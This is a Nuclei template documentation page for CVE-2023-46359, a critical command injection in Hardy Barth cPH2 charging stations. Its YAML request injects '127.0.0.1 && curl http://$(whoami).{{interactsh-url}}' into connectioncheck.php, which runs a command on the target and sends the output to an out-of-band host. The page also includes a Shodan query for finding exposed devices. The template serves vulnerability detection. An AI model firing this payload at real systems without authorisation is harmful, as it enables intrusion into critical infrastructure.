Skip to content
Nuclei Templates

cPH2 Charging Station v1.87.0 - OS Command Injection

ID: CVE-2023-46359

Severity: critical

Author: mlec

Tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth

Description

Section titled “Description”

An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.

YAML Source

Section titled “YAML Source”
id: CVE-2023-46359


info:
  name: cPH2 Charging Station v1.87.0 - OS Command Injection
  author: mlec
  severity: critical
  description: |
    An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.
  remediation: Fixed in version 2.0.0
  reference:
    - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46359
    - http://hardy.com
    - https://github.com/d4n-sec/d4n-sec.github.io
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46359
    cwe-id: CWE-78
    epss-score: 0.1382
    epss-percentile: 0.95642
    cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hardy-barth
    product: cph2_echarge
    shodan-query: html:"Salia PLCC"
  tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth


http:
  - method: GET
    path:
      - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<b>SUCCESS</b>"
          - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"
        condition: and


      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100af58337c1c88ccf2a16a6ffd78664dcfe2341fd4655f33faedd13dcb4f6bfe0702207fe13d6ac1083e5c35625660c00e10a41eb3c51a0df18f4f95d1f9b89500eab1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-46359.yaml"

View on Github